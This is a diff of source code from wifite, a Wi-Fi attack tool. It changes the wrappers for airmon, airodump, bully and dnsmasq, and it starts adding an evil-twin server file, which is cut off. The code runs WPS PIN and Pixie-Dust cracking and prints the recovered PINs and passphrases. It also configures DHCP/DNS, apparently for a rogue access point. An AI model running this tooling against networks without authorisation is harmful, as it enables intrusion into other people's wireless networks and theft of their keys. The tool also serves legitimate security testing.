||||||
@@ -307,7 +317,7 @@ class Airmon(Dependency):
|
|||||||
choice = 1
|
choice = 1
|
||||||
else:
|
else:
|
||||||
# Multiple interfaces found
|
# Multiple interfaces found
|
||||||
question = Color.s('{+} select interface ({G}1-%d{W}): ' % (count))
|
question = Color.s("{+} select interface ({G}1-%d{W}): " % (count))
|
||||||
choice = raw_input(question)
|
choice = raw_input(question)
|
||||||
|
|
||||||
iface = a.get(choice)
|
iface = a.get(choice)
|
||||||
@@ -343,11 +353,8 @@ class Airmon(Dependency):
|
|||||||
|
|
||||||
if not Configuration.kill_conflicting_processes:
|
if not Configuration.kill_conflicting_processes:
|
||||||
# Don't kill processes, warn user
|
# Don't kill processes, warn user
|
||||||
names_and_pids = ', '.join([
|
for pid, pname in pid_pnames:
|
||||||
'{R}%s{O} (PID {R}%s{O})' % (pname, pid)
|
Color.pl('{!} {O}conflicting process: {R}%s{O} (PID {R}%s{O})' % (pname, pid))
|
||||||
for pid, pname in pid_pnames
|
|
||||||
])
|
|
||||||
Color.pl('{!} {O}conflicting processes: %s' % names_and_pids)
|
|
||||||
Color.pl('{!} {O}if you have problems: {R}kill -9 PID{O} or re-run wifite with {R}--kill{O}){W}')
|
Color.pl('{!} {O}if you have problems: {R}kill -9 PID{O} or re-run wifite with {R}--kill{O}){W}')
|
||||||
return
|
return
|
||||||
|
|
||||||
@@ -360,34 +367,32 @@ class Airmon(Dependency):
|
|||||||
Airmon.killed_network_manager = True
|
Airmon.killed_network_manager = True
|
||||||
else:
|
else:
|
||||||
Color.pl('{!} {R}terminating {O}conflicting process {R}%s{O} (PID {R}%s{O})' % (pname, pid))
|
Color.pl('{!} {R}terminating {O}conflicting process {R}%s{O} (PID {R}%s{O})' % (pname, pid))
|
||||||
try:
|
|
||||||
os.kill(int(pid), signal.SIGTERM)
|
os.kill(int(pid), signal.SIGTERM)
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def put_interface_up(iface):
|
def put_interface_up(iface):
|
||||||
Color.p('{!} {O}putting interface {R}%s up{O}...' % (iface))
|
Color.p("{!} {O}putting interface {R}%s up{O}..." % (iface))
|
||||||
Ifconfig.up(iface)
|
Ifconfig.up(iface)
|
||||||
Color.pl(' {G}done{W}')
|
Color.pl(" {G}done{W}")
|
||||||
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def start_network_manager():
|
def start_network_manager():
|
||||||
Color.p('{!} {O}restarting {R}NetworkManager{O}...')
|
Color.p("{!} {O}restarting {R}NetworkManager{O}...")
|
||||||
|
|
||||||
if Process.exists('service'):
|
if Process.exists('service'):
|
||||||
cmd = 'service network-manager start'
|
cmd = 'service network-manager start'
|
||||||
proc = Process(cmd)
|
proc = Process(cmd)
|
||||||
(out, err) = proc.get_output()
|
(out, err) = proc.get_output()
|
||||||
if proc.poll() != 0:
|
if proc.poll() != 0:
|
||||||
Color.pl(' {R}Error executing {O}%s{W}' % cmd)
|
Color.pl(" {R}Error executing {O}%s{W}" % cmd)
|
||||||
if out is not None and out.strip() != '':
|
if out is not None and out.strip() != "":
|
||||||
Color.pl('{!} {O}STDOUT> %s{W}' % out)
|
Color.pl("{!} {O}STDOUT> %s{W}" % out)
|
||||||
if err is not None and err.strip() != '':
|
if err is not None and err.strip() != "":
|
||||||
Color.pl('{!} {O}STDERR> %s{W}' % err)
|
Color.pl("{!} {O}STDERR> %s{W}" % err)
|
||||||
else:
|
else:
|
||||||
Color.pl(' {G}done{W} ({C}%s{W})' % cmd)
|
Color.pl(" {G}done{W} ({C}%s{W})" % cmd)
|
||||||
return
|
return
|
||||||
|
|
||||||
if Process.exists('systemctl'):
|
if Process.exists('systemctl'):
|
||||||
@@ -395,20 +400,21 @@ class Airmon(Dependency):
|
|||||||
proc = Process(cmd)
|
proc = Process(cmd)
|
||||||
(out, err) = proc.get_output()
|
(out, err) = proc.get_output()
|
||||||
if proc.poll() != 0:
|
if proc.poll() != 0:
|
||||||
Color.pl(' {R}Error executing {O}%s{W}' % cmd)
|
Color.pl(" {R}Error executing {O}%s{W}" % cmd)
|
||||||
if out is not None and out.strip() != '':
|
if out is not None and out.strip() != "":
|
||||||
Color.pl('{!} {O}STDOUT> %s{W}' % out)
|
Color.pl("{!} {O}STDOUT> %s{W}" % out)
|
||||||
if err is not None and err.strip() != '':
|
if err is not None and err.strip() != "":
|
||||||
Color.pl('{!} {O}STDERR> %s{W}' % err)
|
Color.pl("{!} {O}STDERR> %s{W}" % err)
|
||||||
else:
|
else:
|
||||||
Color.pl(' {G}done{W} ({C}%s{W})' % cmd)
|
Color.pl(" {G}done{W} ({C}%s{W})" % cmd)
|
||||||
return
|
return
|
||||||
else:
|
else:
|
||||||
Color.pl(' {R}cannot restart NetworkManager: {O}systemctl{R} or {O}service{R} not found{W}')
|
Color.pl(" {R}can't restart NetworkManager: {O}systemctl{R} or {O}service{R} not found{W}")
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
Airmon.terminate_conflicting_processes()
|
Airmon.terminate_conflicting_processes()
|
||||||
iface = Airmon.ask()
|
iface = Airmon.ask()
|
||||||
(disabled_iface, enabled_iface) = Airmon.stop(iface)
|
(disabled_iface, enabled_iface) = Airmon.stop(iface)
|
||||||
print('Disabled:', disabled_iface)
|
print("Disabled:", disabled_iface)
|
||||||
print('Enabled:', enabled_iface)
|
print("Enabled:", enabled_iface)
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -27,7 +27,7 @@ class Airodump(Dependency):
|
|||||||
if interface is None:
|
if interface is None:
|
||||||
interface = Configuration.interface
|
interface = Configuration.interface
|
||||||
if interface is None:
|
if interface is None:
|
||||||
raise Exception('Wireless interface must be defined (-i)')
|
raise Exception("Wireless interface must be defined (-i)")
|
||||||
self.interface = interface
|
self.interface = interface
|
||||||
|
|
||||||
self.targets = []
|
self.targets = []
|
||||||
@@ -137,7 +137,7 @@ class Airodump(Dependency):
|
|||||||
if fil.startswith('replay_') and fil.endswith('.cap') or fil.endswith('.xor'):
|
if fil.startswith('replay_') and fil.endswith('.cap') or fil.endswith('.xor'):
|
||||||
os.remove(os.path.join(temp_dir, fil))
|
os.remove(os.path.join(temp_dir, fil))
|
||||||
|
|
||||||
def get_targets(self, old_targets=[], apply_filter=True):
|
def get_targets(self, apply_filter=True):
|
||||||
''' Parses airodump's CSV file, returns list of Targets '''
|
''' Parses airodump's CSV file, returns list of Targets '''
|
||||||
|
|
||||||
# Find the .CSV file
|
# Find the .CSV file
|
||||||
@@ -150,17 +150,13 @@ class Airodump(Dependency):
|
|||||||
return self.targets # No file found
|
return self.targets # No file found
|
||||||
|
|
||||||
targets = Airodump.get_targets_from_csv(csv_filename)
|
targets = Airodump.get_targets_from_csv(csv_filename)
|
||||||
for old_target in old_targets:
|
|
||||||
for target in targets:
|
|
||||||
if old_target.bssid == target.bssid:
|
|
||||||
target.wps = old_target.wps
|
|
||||||
|
|
||||||
# Check targets for WPS
|
# Check targets for WPS
|
||||||
if not self.skip_wps:
|
if not self.skip_wps:
|
||||||
capfile = csv_filename[:-3] + 'cap'
|
capfile = csv_filename[:-3] + 'cap'
|
||||||
try:
|
try:
|
||||||
Tshark.check_for_wps_and_update_targets(capfile, targets)
|
Tshark.check_for_wps_and_update_targets(capfile, targets)
|
||||||
except ValueError:
|
except Exception as e:
|
||||||
# No tshark, or it failed. Fall-back to wash
|
# No tshark, or it failed. Fall-back to wash
|
||||||
Wash.check_for_wps_and_update_targets(capfile, targets)
|
Wash.check_for_wps_and_update_targets(capfile, targets)
|
||||||
|
|
||||||
@@ -182,6 +178,9 @@ class Airodump(Dependency):
|
|||||||
new_target.decloaked = True
|
new_target.decloaked = True
|
||||||
self.decloaked_bssids.add(new_target.bssid)
|
self.decloaked_bssids.add(new_target.bssid)
|
||||||
|
|
||||||
|
if self.pid.poll() is not None:
|
||||||
|
raise Exception('Airodump has stopped')
|
||||||
|
|
||||||
self.targets = targets
|
self.targets = targets
|
||||||
self.deauth_hidden_targets()
|
self.deauth_hidden_targets()
|
||||||
|
|
||||||
@@ -193,9 +192,10 @@ class Airodump(Dependency):
|
|||||||
'''Returns list of Target objects parsed from CSV file.'''
|
'''Returns list of Target objects parsed from CSV file.'''
|
||||||
targets = []
|
targets = []
|
||||||
import csv
|
import csv
|
||||||
with open(csv_filename, 'r') as csvopen:
|
with open(csv_filename, 'rb') as csvopen:
|
||||||
lines = []
|
lines = []
|
||||||
for line in csvopen:
|
for line in csvopen:
|
||||||
|
if type(line) is bytes: line = line.decode('utf-8')
|
||||||
line = line.replace('\0', '')
|
line = line.replace('\0', '')
|
||||||
lines.append(line)
|
lines.append(line)
|
||||||
csv_reader = csv.reader(lines,
|
csv_reader = csv.reader(lines,
|
||||||
@@ -206,22 +206,22 @@ class Airodump(Dependency):
|
|||||||
|
|
||||||
hit_clients = False
|
hit_clients = False
|
||||||
for row in csv_reader:
|
for row in csv_reader:
|
||||||
# Each 'row' is a list of fields for a target/client
|
# Each "row" is a list of fields for a target/client
|
||||||
|
|
||||||
if len(row) == 0: continue
|
if len(row) == 0: continue
|
||||||
|
|
||||||
if row[0].strip() == 'BSSID':
|
if row[0].strip() == 'BSSID':
|
||||||
# This is the 'header' for the list of Targets
|
# This is the "header" for the list of Targets
|
||||||
hit_clients = False
|
hit_clients = False
|
||||||
continue
|
continue
|
||||||
|
|
||||||
elif row[0].strip() == 'Station MAC':
|
elif row[0].strip() == 'Station MAC':
|
||||||
# This is the 'header' for the list of Clients
|
# This is the "header" for the list of Clients
|
||||||
hit_clients = True
|
hit_clients = True
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if hit_clients:
|
if hit_clients:
|
||||||
# The current row corresponds to a 'Client' (computer)
|
# The current row corresponds to a "Client" (computer)
|
||||||
try:
|
try:
|
||||||
client = Client(row)
|
client = Client(row)
|
||||||
except (IndexError, ValueError) as e:
|
except (IndexError, ValueError) as e:
|
||||||
@@ -239,7 +239,7 @@ class Airodump(Dependency):
|
|||||||
break
|
break
|
||||||
|
|
||||||
else:
|
else:
|
||||||
# The current row corresponds to a 'Target' (router)
|
# The current row corresponds to a "Target" (router)
|
||||||
try:
|
try:
|
||||||
target = Target(row)
|
target = Target(row)
|
||||||
targets.append(target)
|
targets.append(target)
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from .dependency import Dependency
|
from .dependency import Dependency
|
||||||
@@ -23,7 +23,7 @@ class Bully(Attack, Dependency):
|
|||||||
self.total_timeouts = 0
|
self.total_timeouts = 0
|
||||||
self.total_failures = 0
|
self.total_failures = 0
|
||||||
self.locked = False
|
self.locked = False
|
||||||
self.state = '{O}Waiting for beacon{W}'
|
self.state = "{O}Waiting for beacon{W}"
|
||||||
self.start_time = time.time()
|
self.start_time = time.time()
|
||||||
|
|
||||||
self.cracked_pin = self.cracked_key = self.cracked_bssid = self.cracked_essid = None
|
self.cracked_pin = self.cracked_key = self.cracked_bssid = self.cracked_essid = None
|
||||||
@@ -35,17 +35,17 @@ class Bully(Attack, Dependency):
|
|||||||
|
|
||||||
if Process.exists('stdbuf'):
|
if Process.exists('stdbuf'):
|
||||||
self.cmd.extend([
|
self.cmd.extend([
|
||||||
'stdbuf', '-o0' # No buffer. See https://stackoverflow.com/a/40453613/7510292
|
"stdbuf", "-o0" # No buffer. See https://stackoverflow.com/a/40453613/7510292
|
||||||
])
|
])
|
||||||
|
|
||||||
self.cmd.extend([
|
self.cmd.extend([
|
||||||
'bully',
|
"bully",
|
||||||
'--bssid', target.bssid,
|
"--bssid", target.bssid,
|
||||||
'--channel', target.channel,
|
"--channel", target.channel,
|
||||||
'--detectlock', # Detect WPS lockouts unreported by AP
|
"--detectlock", # Detect WPS lockouts unreported by AP
|
||||||
'--force',
|
"--force",
|
||||||
'-v', '4',
|
"-v", "4",
|
||||||
'--pixiewps',
|
"--pixiewps",
|
||||||
Configuration.interface
|
Configuration.interface
|
||||||
])
|
])
|
||||||
|
|
||||||
@@ -58,7 +58,7 @@ class Bully(Attack, Dependency):
|
|||||||
skip_wps=True,
|
skip_wps=True,
|
||||||
output_file_prefix='wps_pin') as airodump:
|
output_file_prefix='wps_pin') as airodump:
|
||||||
# Wait for target
|
# Wait for target
|
||||||
self.pattack('Waiting for target to appear...')
|
self.pattack("Waiting for target to appear...")
|
||||||
self.target = self.wait_for_target(airodump)
|
self.target = self.wait_for_target(airodump)
|
||||||
|
|
||||||
# Start bully
|
# Start bully
|
||||||
@@ -111,7 +111,7 @@ class Bully(Attack, Dependency):
|
|||||||
raise e
|
raise e
|
||||||
|
|
||||||
if self.crack_result is None:
|
if self.crack_result is None:
|
||||||
self.pattack('{R}Failed{W}', newline=True)
|
self.pattack("{R}Failed{W}", newline=True)
|
||||||
|
|
||||||
|
|
||||||
def pattack(self, message, newline=False):
|
def pattack(self, message, newline=False):
|
||||||
@@ -119,12 +119,12 @@ class Bully(Attack, Dependency):
|
|||||||
time_left = Configuration.wps_pixie_timeout - self.running_time()
|
time_left = Configuration.wps_pixie_timeout - self.running_time()
|
||||||
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WPS',
|
Color.pattack("WPS",
|
||||||
self.target,
|
self.target,
|
||||||
'Pixie-Dust',
|
'Pixie-Dust',
|
||||||
'{W}[{C}%s{W}] %s' % (Timer.secs_to_str(time_left), message))
|
'{W}[{C}%s{W}] %s' % (Timer.secs_to_str(time_left), message))
|
||||||
if newline:
|
if newline:
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
|
|
||||||
|
|
||||||
def running_time(self):
|
def running_time(self):
|
||||||
@@ -136,13 +136,13 @@ class Bully(Attack, Dependency):
|
|||||||
|
|
||||||
meta_statuses = []
|
meta_statuses = []
|
||||||
if self.total_timeouts > 0:
|
if self.total_timeouts > 0:
|
||||||
meta_statuses.append('{O}Timeouts:%d{W}' % self.total_timeouts)
|
meta_statuses.append("{O}Timeouts:%d{W}" % self.total_timeouts)
|
||||||
|
|
||||||
if self.total_failures > 0:
|
if self.total_failures > 0:
|
||||||
meta_statuses.append('{O}WPSFail:%d{W}' % self.total_failures)
|
meta_statuses.append("{O}WPSFail:%d{W}" % self.total_failures)
|
||||||
|
|
||||||
if self.locked:
|
if self.locked:
|
||||||
meta_statuses.append('{R}Locked{W}')
|
meta_statuses.append("{R}Locked{W}")
|
||||||
|
|
||||||
if len(meta_statuses) > 0:
|
if len(meta_statuses) > 0:
|
||||||
main_status += ' (%s)' % ', '.join(meta_statuses)
|
main_status += ' (%s)' % ', '.join(meta_statuses)
|
||||||
@@ -151,9 +151,9 @@ class Bully(Attack, Dependency):
|
|||||||
|
|
||||||
|
|
||||||
def parse_line_thread(self):
|
def parse_line_thread(self):
|
||||||
for line in iter(self.bully_proc.pid.stdout.readline, b''):
|
for line in iter(self.bully_proc.pid.stdout.readline, b""):
|
||||||
if line == '': continue
|
if line == "": continue
|
||||||
line = line.replace('\r', '').replace('\n', '').strip()
|
line = line.replace("\r", "").replace("\n", "").strip()
|
||||||
|
|
||||||
if Configuration.verbose > 1:
|
if Configuration.verbose > 1:
|
||||||
Color.pe('\n{P} [bully:stdout] %s' % line)
|
Color.pe('\n{P} [bully:stdout] %s' % line)
|
||||||
@@ -189,9 +189,9 @@ class Bully(Attack, Dependency):
|
|||||||
|
|
||||||
if self.cracked_pin is not None:
|
if self.cracked_pin is not None:
|
||||||
# Mention the PIN & that we're not done yet.
|
# Mention the PIN & that we're not done yet.
|
||||||
self.pattack('{G}Cracked PIN: {C}%s{W}' % self.cracked_pin, newline=True)
|
self.pattack("{G}Cracked PIN: {C}%s{W}" % self.cracked_pin, newline=True)
|
||||||
|
|
||||||
self.state = '{G}Finding PSK...{C}'
|
self.state = "{G}Finding PSK...{C}"
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
@@ -201,13 +201,13 @@ class Bully(Attack, Dependency):
|
|||||||
self.cracked_key = key_re.group(1)
|
self.cracked_key = key_re.group(1)
|
||||||
|
|
||||||
if not self.crack_result and self.cracked_pin and self.cracked_key:
|
if not self.crack_result and self.cracked_pin and self.cracked_key:
|
||||||
self.pattack('{G}Cracked PSK: {C}%s{W}' % self.cracked_key, newline=True)
|
self.pattack("{G}Cracked PSK: {C}%s{W}" % self.cracked_key, newline=True)
|
||||||
self.crack_result = CrackResultWPS(
|
self.crack_result = CrackResultWPS(
|
||||||
self.target.bssid,
|
self.target.bssid,
|
||||||
self.target.essid,
|
self.target.essid,
|
||||||
self.cracked_pin,
|
self.cracked_pin,
|
||||||
self.cracked_key)
|
self.cracked_key)
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
self.crack_result.dump()
|
self.crack_result.dump()
|
||||||
|
|
||||||
return self.crack_result
|
return self.crack_result
|
||||||
@@ -220,14 +220,14 @@ class Bully(Attack, Dependency):
|
|||||||
got_beacon = re.search(r".*Got beacon for '(.*)' \((.*)\)", line)
|
got_beacon = re.search(r".*Got beacon for '(.*)' \((.*)\)", line)
|
||||||
if got_beacon:
|
if got_beacon:
|
||||||
# group(1)=ESSID, group(2)=BSSID
|
# group(1)=ESSID, group(2)=BSSID
|
||||||
state = 'Got beacon'
|
state = "Got beacon"
|
||||||
|
|
||||||
# [+] Last State = 'NoAssoc' Next pin '48855501'
|
# [+] Last State = 'NoAssoc' Next pin '48855501'
|
||||||
last_state = re.search(r".*Last State = '(.*)'\s*Next pin '(.*)'", line)
|
last_state = re.search(r".*Last State = '(.*)'\s*Next pin '(.*)'", line)
|
||||||
if last_state:
|
if last_state:
|
||||||
# group(1)=result, group(2)=PIN
|
# group(1)=result, group(2)=PIN
|
||||||
pin = last_state.group(2)
|
pin = last_state.group(2)
|
||||||
state = 'Trying PIN {C}%s{W} (%s)' % (pin, last_state.group(1))
|
state = "Trying PIN {C}%s{W} (%s)" % (pin, last_state.group(1))
|
||||||
|
|
||||||
# [+] Tx( Auth ) = 'Timeout' Next pin '80241263'
|
# [+] Tx( Auth ) = 'Timeout' Next pin '80241263'
|
||||||
mx_result_pin = re.search(r".*[RT]x\(\s*(.*)\s*\) = '(.*)'\s*Next pin '(.*)'", line)
|
mx_result_pin = re.search(r".*[RT]x\(\s*(.*)\s*\) = '(.*)'\s*Next pin '(.*)'", line)
|
||||||
@@ -238,42 +238,42 @@ class Bully(Attack, Dependency):
|
|||||||
result = mx_result_pin.group(2) # NoAssoc, WPSFail, Pin1Bad, Pin2Bad
|
result = mx_result_pin.group(2) # NoAssoc, WPSFail, Pin1Bad, Pin2Bad
|
||||||
pin = mx_result_pin.group(3)
|
pin = mx_result_pin.group(3)
|
||||||
|
|
||||||
if result == 'Timeout':
|
if result == "Timeout":
|
||||||
self.total_timeouts += 1
|
self.total_timeouts += 1
|
||||||
result = '{O}%s{W}' % result
|
result = "{O}%s{W}" % result
|
||||||
elif result == 'WPSFail':
|
elif result == "WPSFail":
|
||||||
self.total_failures += 1
|
self.total_failures += 1
|
||||||
result = '{O}%s{W}' % result
|
result = "{O}%s{W}" % result
|
||||||
elif result == 'NoAssoc':
|
elif result == "NoAssoc":
|
||||||
result = '{O}%s{W}' % result
|
result = "{O}%s{W}" % result
|
||||||
else:
|
else:
|
||||||
result = '{R}%s{W}' % result
|
result = "{R}%s{W}" % result
|
||||||
|
|
||||||
result = '{P}%s{W}:%s' % (m_state.strip(), result.strip())
|
result = "{P}%s{W}:%s" % (m_state.strip(), result.strip())
|
||||||
state = 'Trying PIN {C}%s{W} (%s)' % (pin, result)
|
state = "Trying PIN {C}%s{W} (%s)" % (pin, result)
|
||||||
|
|
||||||
# [!] WPS lockout reported, sleeping for 43 seconds ...
|
# [!] WPS lockout reported, sleeping for 43 seconds ...
|
||||||
re_lockout = re.search(r".*WPS lockout reported, sleeping for (\d+) seconds", line)
|
re_lockout = re.search(r".*WPS lockout reported, sleeping for (\d+) seconds", line)
|
||||||
if re_lockout:
|
if re_lockout:
|
||||||
self.locked = True
|
self.locked = True
|
||||||
sleeping = re_lockout.group(1)
|
sleeping = re_lockout.group(1)
|
||||||
state = '{R}WPS Lock-out: {O}Waiting %s seconds{W}' % sleeping
|
state = "{R}WPS Lock-out: {O}Waiting %s seconds{W}" % sleeping
|
||||||
|
|
||||||
# [Pixie-Dust] WPS pin not found
|
# [Pixie-Dust] WPS pin not found
|
||||||
re_pin_not_found = re.search(r".*\[Pixie-Dust\] WPS pin not found", line)
|
re_pin_not_found = re.search(r".*\[Pixie-Dust\] WPS pin not found", line)
|
||||||
if re_pin_not_found:
|
if re_pin_not_found:
|
||||||
state = '{R}Failed: {O}Bully says "WPS pin not found"{W}'
|
state = "{R}Failed: {O}Bully says 'WPS pin not found'{W}"
|
||||||
|
|
||||||
# [+] Running pixiewps with the information, wait ...
|
# [+] Running pixiewps with the information, wait ...
|
||||||
re_running_pixiewps = re.search(r".*Running pixiewps with the information", line)
|
re_running_pixiewps = re.search(r".*Running pixiewps with the information", line)
|
||||||
if re_running_pixiewps:
|
if re_running_pixiewps:
|
||||||
state = '{G}Running pixiewps...{W}'
|
state = "{G}Running pixiewps...{W}"
|
||||||
|
|
||||||
return state
|
return state
|
||||||
|
|
||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
if hasattr(self, 'pid') and self.pid and self.pid.poll() is None:
|
if hasattr(self, "pid") and self.pid and self.pid.poll() is None:
|
||||||
self.pid.interrupt()
|
self.pid.interrupt()
|
||||||
|
|
||||||
|
|
||||||
@@ -283,7 +283,7 @@ class Bully(Attack, Dependency):
|
|||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_psk_from_pin(target, pin):
|
def get_psk_from_pin(target, pin):
|
||||||
# Fetches PSK from a Target assuming 'pin' is the correct PIN
|
# Fetches PSK from a Target assuming "pin" is the correct PIN
|
||||||
'''
|
'''
|
||||||
bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon
|
bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon
|
||||||
PIN : '01030365'
|
PIN : '01030365'
|
||||||
@@ -319,7 +319,7 @@ if __name__ == '__main__':
|
|||||||
fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',')
|
fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',')
|
||||||
target = Target(fields)
|
target = Target(fields)
|
||||||
psk = Bully.get_psk_from_pin(target, '01030365')
|
psk = Bully.get_psk_from_pin(target, '01030365')
|
||||||
print('psk', psk)
|
print("psk", psk)
|
||||||
|
|
||||||
'''
|
'''
|
||||||
stdout = " [*] Pin is '11867722', key is '9a6f7997'"
|
stdout = " [*] Pin is '11867722', key is '9a6f7997'"
|
||||||
|
|||||||
53
wifite/tools/dependency.py
Executable file → Normal file
53
wifite/tools/dependency.py
Executable file → Normal file
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
class Dependency(object):
|
class Dependency(object):
|
||||||
@@ -9,52 +9,11 @@ class Dependency(object):
|
|||||||
for attr_name in cls.required_attr_names:
|
for attr_name in cls.required_attr_names:
|
||||||
if not attr_name in cls.__dict__:
|
if not attr_name in cls.__dict__:
|
||||||
raise NotImplementedError(
|
raise NotImplementedError(
|
||||||
'Attribute "{}" has not been overridden in class "{}"' \
|
"Attribute '{}' has not been overriden in class '{}'" \
|
||||||
.format(attr_name, cls.__name__)
|
.format(attr_name, cls.__name__)
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def run_dependency_check(cls):
|
|
||||||
from ..util.color import Color
|
|
||||||
|
|
||||||
from .airmon import Airmon
|
|
||||||
from .airodump import Airodump
|
|
||||||
from .aircrack import Aircrack
|
|
||||||
from .aireplay import Aireplay
|
|
||||||
from .ifconfig import Ifconfig
|
|
||||||
from .iwconfig import Iwconfig
|
|
||||||
from .bully import Bully
|
|
||||||
from .reaver import Reaver
|
|
||||||
from .wash import Wash
|
|
||||||
from .pyrit import Pyrit
|
|
||||||
from .tshark import Tshark
|
|
||||||
from .macchanger import Macchanger
|
|
||||||
from .hashcat import Hashcat, HcxDumpTool, HcxPcapTool
|
|
||||||
|
|
||||||
apps = [
|
|
||||||
# Aircrack
|
|
||||||
Aircrack, #Airodump, Airmon, Aireplay,
|
|
||||||
# wireless/net tools
|
|
||||||
Iwconfig, Ifconfig,
|
|
||||||
# WPS
|
|
||||||
Reaver, Bully,
|
|
||||||
# Cracking/handshakes
|
|
||||||
Pyrit, Tshark,
|
|
||||||
# Hashcat
|
|
||||||
Hashcat, HcxDumpTool, HcxPcapTool,
|
|
||||||
# Misc
|
|
||||||
Macchanger
|
|
||||||
]
|
|
||||||
|
|
||||||
missing_required = any([app.fails_dependency_check() for app in apps])
|
|
||||||
|
|
||||||
if missing_required:
|
|
||||||
Color.pl('{!} {O}At least 1 Required app is missing. Wifite needs Required apps to run{W}')
|
|
||||||
import sys
|
|
||||||
sys.exit(-1)
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
@classmethod
|
||||||
def fails_dependency_check(cls):
|
def fails_dependency_check(cls):
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
@@ -64,11 +23,11 @@ class Dependency(object):
|
|||||||
return False
|
return False
|
||||||
|
|
||||||
if cls.dependency_required:
|
if cls.dependency_required:
|
||||||
Color.p('{!} {O}Error: Required app {R}%s{O} was not found' % cls.dependency_name)
|
Color.pl('{!} {R}error: required app {O}%s{R} was not found' % cls.dependency_name)
|
||||||
Color.pl('. {W}install @ {C}%s{W}' % cls.dependency_url)
|
Color.pl(' {W}install @ {C}%s{W}' % cls.dependency_url)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
else:
|
else:
|
||||||
Color.p('{!} {O}Warning: Recommended app {R}%s{O} was not found' % cls.dependency_name)
|
Color.pl('{!} {O}warning: recommended app {R}%s{O} was not found' % cls.dependency_name)
|
||||||
Color.pl('. {W}install @ {C}%s{W}' % cls.dependency_url)
|
Color.pl(' {W}install @ {C}%s{W}' % cls.dependency_url)
|
||||||
return False
|
return False
|
||||||
|
|||||||
71
wifite/tools/dnsmasq.py
Executable file
71
wifite/tools/dnsmasq.py
Executable file
@@ -0,0 +1,71 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import os
|
||||||
|
|
||||||
|
from .dependency import Dependency
|
||||||
|
from ..util.process import Process
|
||||||
|
from ..config import Configuration
|
||||||
|
|
||||||
|
class Dnsmasq(Dependency):
|
||||||
|
'''Wrapper for dnsmasq program.'''
|
||||||
|
|
||||||
|
dependency_required = False
|
||||||
|
dependency_name = 'dnsmasq'
|
||||||
|
dependency_url = 'apt-get install dnsmasq'
|
||||||
|
|
||||||
|
def __init__(self, interface):
|
||||||
|
self.interface = interface
|
||||||
|
self.pid = None
|
||||||
|
self.config_file = None
|
||||||
|
|
||||||
|
|
||||||
|
def create_config_file(self):
|
||||||
|
self.config_file = os.path.join(Configuration.temp(), 'dnsmasq.conf')
|
||||||
|
if os.path.exists(self.config_file):
|
||||||
|
os.remove(self.config_file)
|
||||||
|
|
||||||
|
with open(self.config_file, 'w') as config:
|
||||||
|
config.write('interface={}\n'.format(self.interface))
|
||||||
|
config.write('dhcp-range=10.0.0.10,10.0.0.100,8h\n')
|
||||||
|
config.write('dhcp-option=3,10.0.0.1\n')
|
||||||
|
config.write('dhcp-option=6,10.0.0.1\n')
|
||||||
|
config.write('server=8.8.8.8\n')
|
||||||
|
config.write('log-queries\n')
|
||||||
|
config.write('log-dhcp\n')
|
||||||
|
|
||||||
|
|
||||||
|
def start(self):
|
||||||
|
self.create_config_file()
|
||||||
|
|
||||||
|
# Stop already-running dnsmasq process
|
||||||
|
self.killall()
|
||||||
|
|
||||||
|
# Start new dnsmasq process
|
||||||
|
self.pid = Process([
|
||||||
|
'dnsmasq',
|
||||||
|
'-C', self.config_file
|
||||||
|
])
|
||||||
|
|
||||||
|
|
||||||
|
def stop(self):
|
||||||
|
# Kill dnsmasq process
|
||||||
|
if self.pid and self.pid.poll() is not None:
|
||||||
|
self.pid.interrupt()
|
||||||
|
|
||||||
|
self.killall()
|
||||||
|
|
||||||
|
if self.config_file and os.path.exists(self.config_file):
|
||||||
|
os.remove(self.config_file)
|
||||||
|
|
||||||
|
|
||||||
|
def killall(self):
|
||||||
|
Process(['killall', 'dnsmasq']).wait()
|
||||||
|
# TODO: Wait until dnsmasq is completely stopped.
|
||||||
|
|
||||||
|
|
||||||
|
def check(self):
|
||||||
|
if self.pid.poll() is not None:
|
||||||
|
raise Exception('dnsmasq stopped running, exit code: %d, output: %s' % (self.pid.poll(), self.pid.stdout()))
|
||||||
|
# TODO: Check logs/output for problems
|
||||||
|
|
||||||
84
wifite/tools/eviltwin_server.py
Normal file
84
wifite/tools/eviltwin_server.py
Normal file
